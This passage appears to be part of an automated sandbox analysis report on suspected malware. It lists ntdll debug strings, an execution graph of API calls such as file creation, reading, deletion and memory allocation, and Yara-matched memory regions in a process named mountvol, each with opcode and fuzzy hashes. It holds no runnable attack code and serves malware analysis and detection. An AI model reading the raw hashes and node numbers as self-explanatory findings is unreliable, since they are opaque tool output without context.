                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 0180365C
                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01803640, 0180366C
                                                                                        • LdrpFindDllActivationContext, xrefs: 01803636, 01803662
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$[$]:%u
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: 0IFw$0IFw$0IFw$X
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 0180031E
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018002BD
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018002E7
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                        APIs
                                                                                        • RtlDebugPrintTimes.NTDLL ref: 01868B03
                                                                                        • RtlDebugPrintTimes.NTDLL ref: 01868B5B
                                                                                          • Part of subcall function 017D2B60: LdrInitializeThunk.NTDLL ref: 017D2B6A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes$InitializeThunk
                                                                                        • String ID: $File
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 01807BAC
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01807B7F
                                                                                        • RTL: Resource at %p, xrefs: 01807B8E
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0180728C
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 018072C1
                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01807294
                                                                                        • RTL: Resource at %p, xrefs: 018072A3
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$]:%u
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Wow64 Emulation Layer
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                        • String ID:
                                                                                        • API String ID: 4281723722-0
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-
                                                                                        • API String ID: 1302938615-2137968064
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0$Flst
                                                                                        • API String ID: 0-758220159
                                                                                        APIs
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0181CFBD
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8
                                                                                        • String ID: @$@4Qw@4Qw
                                                                                        • API String ID: 4062629308-2383119779
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: 0$0
                                                                                        • API String ID: 3446177414-203156872

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.5%
                                                                                        Dynamic/Decrypted Code Coverage:4.4%
                                                                                        Signature Coverage:2.3%
                                                                                        Total number of Nodes:433
                                                                                        Total number of Limit Nodes:71
100709->100710 100710->100686 100711 2a43610 100710->100711 100712 2a4361e 100711->100712 100713 2a43625 100711->100713 100712->100689 100714 2a347a0 LdrLoadDll 100713->100714 100715 2a4365a 100714->100715 100716 2a43669 100715->100716 100739 2a430d0 LdrLoadDll 100715->100739 100718 2a4b930 RtlAllocateHeap 100716->100718 100722 2a43814 100716->100722 100719 2a43682 100718->100719 100720 2a4380a 100719->100720 100719->100722 100723 2a4369e 100719->100723 100721 2a4b850 RtlFreeHeap 100720->100721 100720->100722 100721->100722 100722->100689 100723->100722 100724 2a4b850 RtlFreeHeap 100723->100724 100725 2a437fe 100724->100725 100725->100689 100727 2a3a3b6 100726->100727 100740 2a3dde0 100727->100740 100729 2a3a428 100731 2a3a5b0 100729->100731 100732 2a3a446 100729->100732 100730 2a3a595 100730->100689 100731->100730 100733 2a3a250 RtlFreeHeap 100731->100733 100732->100730 100745 2a3a250 100732->100745 100733->100731 100736 2a3a726 100735->100736 100737 2a3dde0 RtlFreeHeap 100736->100737 100738 2a3a7ad 100737->100738 100738->100691 100739->100716 100741 2a3de04 100740->100741 100742 2a3de11 100741->100742 100743 2a4b850 RtlFreeHeap 100741->100743 100742->100729 100744 2a3de54 100743->100744 100744->100729 100746 2a3a26d 100745->100746 100749 2a3de70 100746->100749 100748 2a3a373 100748->100732 100750 2a3de94 100749->100750 100751 2a3df3e 100750->100751 100752 2a4b850 RtlFreeHeap 100750->100752 100751->100748 100752->100751 100758 2a41dc0 100759 2a41dd9 100758->100759 100760 2a41e24 100759->100760 100763 2a41e64 100759->100763 100765 2a41e69 100759->100765 100761 2a4b850 RtlFreeHeap 100760->100761 100762 2a41e34 100761->100762 100764 2a4b850 RtlFreeHeap 100763->100764 100764->100765 100768 2a3fad0 100769 2a3fb34 100768->100769 100797 2a36520 100769->100797 100771 2a3fc6e 100772 2a3fc67 100772->100771 100804 2a36630 100772->100804 100774 2a3fe13 100775 2a3fcea 100775->100774 100776 2a3fe22 100775->100776 100808 2a3f8b0 100775->100808 100777 2a49770 NtClose 
100776->100777 100779 2a3fe2c 100777->100779 100780 2a3fd26 100780->100776 100781 2a3fd31 100780->100781 100782 2a4b930 RtlAllocateHeap 100781->100782 100783 2a3fd5a 100782->100783 100784 2a3fd63 100783->100784 100785 2a3fd79 100783->100785 100786 2a49770 NtClose 100784->100786 100817 2a3f7a0 CoInitialize 100785->100817 100788 2a3fd6d 100786->100788 100791 2a3fe02 100792 2a49770 NtClose 100791->100792 100793 2a3fe0c 100792->100793 100794 2a4b850 RtlFreeHeap 100793->100794 100794->100774 100795 2a3fda5 100795->100791 100796 2a49230 LdrInitializeThunk 100795->100796 100796->100795 100798 2a36553 100797->100798 100799 2a36577 100798->100799 100825 2a492d0 100798->100825 100799->100772 100801 2a3659a 100801->100799 100802 2a49770 NtClose 100801->100802 100803 2a3661c 100802->100803 100803->100772 100805 2a36655 100804->100805 100830 2a490e0 100805->100830 100809 2a3f8cc 100808->100809 100810 2a347a0 LdrLoadDll 100809->100810 100812 2a3f8ea 100810->100812 100811 2a3f8f3 100811->100780 100812->100811 100813 2a347a0 LdrLoadDll 100812->100813 100814 2a3f9be 100813->100814 100815 2a347a0 LdrLoadDll 100814->100815 100816 2a3fa18 100814->100816 100815->100816 100816->100780 100820 2a3f805 100817->100820 100818 2a3f89b CoUninitialize 100819 2a3f8a1 100818->100819 100821 2a49230 100819->100821 100820->100818 100822 2a4924a 100821->100822 100835 3122ba0 LdrInitializeThunk 100822->100835 100823 2a4927a 100823->100795 100826 2a492ed 100825->100826 100829 3122ca0 LdrInitializeThunk 100826->100829 100827 2a49319 100827->100801 100829->100827 100831 2a490fd 100830->100831 100834 3122c60 LdrInitializeThunk 100831->100834 100832 2a366c9 100832->100775 100834->100832 100835->100823 100836 2a324d0 100837 2a324dd 100836->100837 100838 2a48dc0 LdrInitializeThunk 100837->100838 100839 2a32506 100838->100839 100842 2a49800 100839->100842 100841 2a3251b 100843 2a4988f 100842->100843 100844 2a4982b 100842->100844 100847 3122e80 LdrInitializeThunk 100843->100847 100844->100841 100845 2a498c0 
100845->100841 100847->100845 100848 2a35e10 100849 2a38360 LdrInitializeThunk 100848->100849 100850 2a35e40 100849->100850 100852 2a35e8a 100850->100852 100853 2a35e6c 100850->100853 100854 2a382e0 100850->100854 100855 2a38324 100854->100855 100860 2a38345 100855->100860 100861 2a48a90 100855->100861 100857 2a38335 100858 2a38351 100857->100858 100859 2a49770 NtClose 100857->100859 100858->100850 100859->100860 100860->100850 100862 2a48b0d 100861->100862 100864 2a48abb 100861->100864 100866 3124650 LdrInitializeThunk 100862->100866 100863 2a48b32 100863->100857 100864->100857 100866->100863 100867 2a38a50 100868 2a38a03 100867->100868 100869 2a38a55 100867->100869 100869->100868 100871 2a37310 100869->100871 100872 2a37326 100871->100872 100874 2a3735f 100871->100874 100872->100874 100875 2a37180 LdrLoadDll 100872->100875 100874->100868 100875->100874 100876 2a37390 100877 2a373ac 100876->100877 100880 2a373ff 100876->100880 100879 2a49770 NtClose 100877->100879 100877->100880 100878 2a37537 100881 2a373c7 100879->100881 100880->100878 100887 2a367b0 NtClose LdrInitializeThunk LdrInitializeThunk 100880->100887 100886 2a367b0 NtClose LdrInitializeThunk LdrInitializeThunk 100881->100886 100883 2a37511 100883->100878 100888 2a36980 NtClose LdrInitializeThunk LdrInitializeThunk 100883->100888 100886->100880 100887->100883 100888->100878 100894 2a496d0 100895 2a49747 100894->100895 100897 2a496fb 100894->100897 100896 2a4975d NtDeleteFile 100895->100896 100903 2a403d0 100904 2a403f3 100903->100904 100905 2a347a0 LdrLoadDll 100904->100905 100906 2a40417 100905->100906 100907 2a39e9b 100909 2a39ea1 100907->100909 100908 2a39ecd 100909->100908 100910 2a4b850 RtlFreeHeap 100909->100910 100910->100908 100911 2a3299a 100912 2a36520 2 API calls 100911->100912 100913 2a329d3 100912->100913

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: &o$+$0b$3)$;$=$Cj$F$Qh$Ul$_U$f}$g*$m4$n6$q0$}l$*$2$L$}
                                                                                        • API String ID: 0-4041391445
                                                                                        • Opcode ID: 2ebeae2df7bb68d54bfc22f77f8e34397705c6db3894e8458308717ca3fd99d4
                                                                                        • Instruction ID: 31bd8f097c40ab8994ababea890621aa8865abc231f23cad22087e0d1fe010a4
                                                                                        • Opcode Fuzzy Hash: 2ebeae2df7bb68d54bfc22f77f8e34397705c6db3894e8458308717ca3fd99d4
                                                                                        • Instruction Fuzzy Hash: BC228EB0D05629CBEB24CF98C998BEDBBB1BB45308F1081DAC50D7B281DB755A89CF54
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A3C954
                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02A3C98F
                                                                                        • FindClose.KERNELBASE(?), ref: 02A3C99A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3541575487-0
                                                                                        • Opcode ID: cd44eac4657e2d8e493b86929044e15a3fd1de6e927289ff7c93b2b05651424b
                                                                                        • Instruction ID: 6c1bd21047c58359947e8515c53e3d9215446573d0ee3da45a30f78f9cd8e6f4
                                                                                        • Opcode Fuzzy Hash: cd44eac4657e2d8e493b86929044e15a3fd1de6e927289ff7c93b2b05651424b
                                                                                        • Instruction Fuzzy Hash: F1319271A40308ABDB21DF64CDC5FEE777E9F84758F104459B908A7180DF70AA84CBA0
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,618D4921,?,?,?,?,?), ref: 02A4956B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 24933e51439b23e441a6cdccec528dd219e56052841bdb2fa39ade5dcfd21af0
                                                                                        • Instruction ID: ba2290d6e82dd54a475c5c60516a1c6ae451937d2206eaafcb42ed2bca00e1ef
                                                                                        • Opcode Fuzzy Hash: 24933e51439b23e441a6cdccec528dd219e56052841bdb2fa39ade5dcfd21af0
                                                                                        • Instruction Fuzzy Hash: 0231C5B5A40648AFDB14DF98D881EDEB7F9EF8C304F108219F918A7240D730A851CFA4
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,618D4921,?,?,?), ref: 02A496C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 6f4ad4b8d1f7fce5ade859750167c4e05e4523ef5d0e33518a5a1ea74dc2fd05
                                                                                        • Instruction ID: 82de895d49f7cf7d60d244e40490a9345dea86fb9c3a945e0892328b6d3c7dad
                                                                                        • Opcode Fuzzy Hash: 6f4ad4b8d1f7fce5ade859750167c4e05e4523ef5d0e33518a5a1ea74dc2fd05
                                                                                        • Instruction Fuzzy Hash: CD31D8B5A40648AFDB14DF98D881EEEB7B9EF88314F108219F918A7240D730A811CFA4
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(02A31FAE,?,02A4826F,00000000,00000004,618D4921,?,?,?,?,?,02A4826F,02A31FAE), ref: 02A49998
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: 84dbb807530236959b87924d06af7e0aeba798c94e816ebfd7ca1c8bd176efdd
                                                                                        • Instruction ID: 6a017583b82981294fbb3022c3ac5f7c49ac5ac86aa35b1171c9c27b34ebab37
                                                                                        • Opcode Fuzzy Hash: 84dbb807530236959b87924d06af7e0aeba798c94e816ebfd7ca1c8bd176efdd
                                                                                        • Instruction Fuzzy Hash: 07210AB5A40249ABDB10DF98DC81EEFB7B9EF88310F108519F958A7241DB70A911CBA1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: 05130372a0391a98de97a1749ee98865b0860d6e5e7f8ed223d2358e5c93c039
                                                                                        • Instruction ID: adf23e513ba576efb06681a08b8627d274a5d9d702ee6dfe1db79276c3078628
                                                                                        • Opcode Fuzzy Hash: 05130372a0391a98de97a1749ee98865b0860d6e5e7f8ed223d2358e5c93c039
                                                                                        • Instruction Fuzzy Hash: 6411A371580708BAD610EB68CC81FEBB7ADDFC9314F008559F90C67241DB71B515CBA1
                                                                                        APIs
                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A497A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 3a648ce88628a05c2ddc7387a078bf85c9b2b0d74a8cd61bb1559c6bf325344b
                                                                                        • Instruction ID: 3294b6c41155e233d2174b92d7193714c33cd5c1793843f80e100efdc6a8e6e6
                                                                                        • Opcode Fuzzy Hash: 3a648ce88628a05c2ddc7387a078bf85c9b2b0d74a8cd61bb1559c6bf325344b
                                                                                        • Instruction Fuzzy Hash: FFE08C36244614BBD220EB6ACC41F9B77ADEFC5728F008419FA0DA7242CB71B9118BF0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 41f14275d891e899ccc3a34c8a79903f51f5d97daa86327873f0e276c8f32b0f
                                                                                        • Instruction ID: 67fbabd9a2014e55a077338390fbe21c7339522b6d9a67dd74739d4b5de308eb
                                                                                        • Opcode Fuzzy Hash: 41f14275d891e899ccc3a34c8a79903f51f5d97daa86327873f0e276c8f32b0f
                                                                                        • Instruction Fuzzy Hash: DC900231605804139540B2584984546501597E5301B55D011F0429554C8B148A5A6361
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 538d17563b176872975bf941407dae588868c4d78b3edd0b63af9f34f78e0012
                                                                                        • Instruction ID: f2f5a701dbb432f583a339ff0542be74fab39d7837208e2394eef21e1482cc8c
                                                                                        • Opcode Fuzzy Hash: 538d17563b176872975bf941407dae588868c4d78b3edd0b63af9f34f78e0012
                                                                                        • Instruction Fuzzy Hash: D3900261601504434540B2584904406701597E6301395D115B0559560C87188959A269
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e5e697a7f64f8950e82dc3d1cf79ed788b9eaea65be3591cc64ff8843c4e955d
                                                                                        • Instruction ID: ffd7b6b456879e820e6180cd9f4566dfcfe618c98d02028741f24500f360680c
                                                                                        • Opcode Fuzzy Hash: e5e697a7f64f8950e82dc3d1cf79ed788b9eaea65be3591cc64ff8843c4e955d
                                                                                        • Instruction Fuzzy Hash: A3900261202404034505B2584514616501A87E5201B55D021F1019590DC72589957125
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 0ae70537d80c471ec9b41dc9438afc9bb16c7c309e952b2b503d802257aacd14
                                                                                        • Instruction ID: 940ecfc352d706d1e2d44d33e2b907c3706106177a4cd19237f220ff59d52ab4
                                                                                        • Opcode Fuzzy Hash: 0ae70537d80c471ec9b41dc9438afc9bb16c7c309e952b2b503d802257aacd14
                                                                                        • Instruction Fuzzy Hash: 6C90023160540C03D550B2584514746101587D5301F55D011B0029654D87558B5976A1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ede7c6423e283856692b907ef8db7ea62c6bf0d6f33189339d099880cfb9021d
                                                                                        • Instruction ID: 0838ea15cedcde8ace62bffb270081d892f525e7163447e8d8d955b06f98e84e
                                                                                        • Opcode Fuzzy Hash: ede7c6423e283856692b907ef8db7ea62c6bf0d6f33189339d099880cfb9021d
                                                                                        • Instruction Fuzzy Hash: 8890023120140C03D580B258450464A101587D6301F95D015B002A654DCB158B5D77A1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 058e4115251dac602f16778c43d355500b9c8a54107476a2782f390e3388e7c4
                                                                                        • Instruction ID: 9ec314e3a738eec5749c332c8b9e6f21bd9872214ade234f4ab45b9f2cee5cd9
                                                                                        • Opcode Fuzzy Hash: 058e4115251dac602f16778c43d355500b9c8a54107476a2782f390e3388e7c4
                                                                                        • Instruction Fuzzy Hash: A590023120544C43D540B2584504A46102587D5305F55D011B0069694D97258E59B661
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: b6c4bf94118e6b2ab4543e3534b4f38d1b027bdf28c75390f099331709b6bed0
                                                                                        • Instruction ID: 97c1d2e4d7a1d34c4f0437d3fa0a0431553e48d52864264f3345047a9862aa0c
                                                                                        • Opcode Fuzzy Hash: b6c4bf94118e6b2ab4543e3534b4f38d1b027bdf28c75390f099331709b6bed0
                                                                                        • Instruction Fuzzy Hash: 31900435311404030505F75C07045071057C7DF351355D031F101F550CD731CD757131
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7ced6fcde2159cec5efd6697e234cadcdab6d09a43bbf27a4e738a5f2f66e263
                                                                                        • Instruction ID: 5a38659a857b8d042ae7377a7f425e41e6d53bec674fe3d04794761e7335e51d
                                                                                        • Opcode Fuzzy Hash: 7ced6fcde2159cec5efd6697e234cadcdab6d09a43bbf27a4e738a5f2f66e263
                                                                                        • Instruction Fuzzy Hash: 2A900225221404030545F658070450B145597DB351395D015F141B590CC72189696321
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c5575a81336e985f8f8c39aca16eae48a3d7541e18fa98a8fadbb32f965e2ff5
                                                                                        • Instruction ID: f8156f7aa99e82b7bdca2c4041d6eeabdd145618368c7ae7772559dab75d04b3
                                                                                        • Opcode Fuzzy Hash: c5575a81336e985f8f8c39aca16eae48a3d7541e18fa98a8fadbb32f965e2ff5
                                                                                        • Instruction Fuzzy Hash: FA90026134140843D500B2584514B061015C7E6301F55D015F1069554D8719CD567126
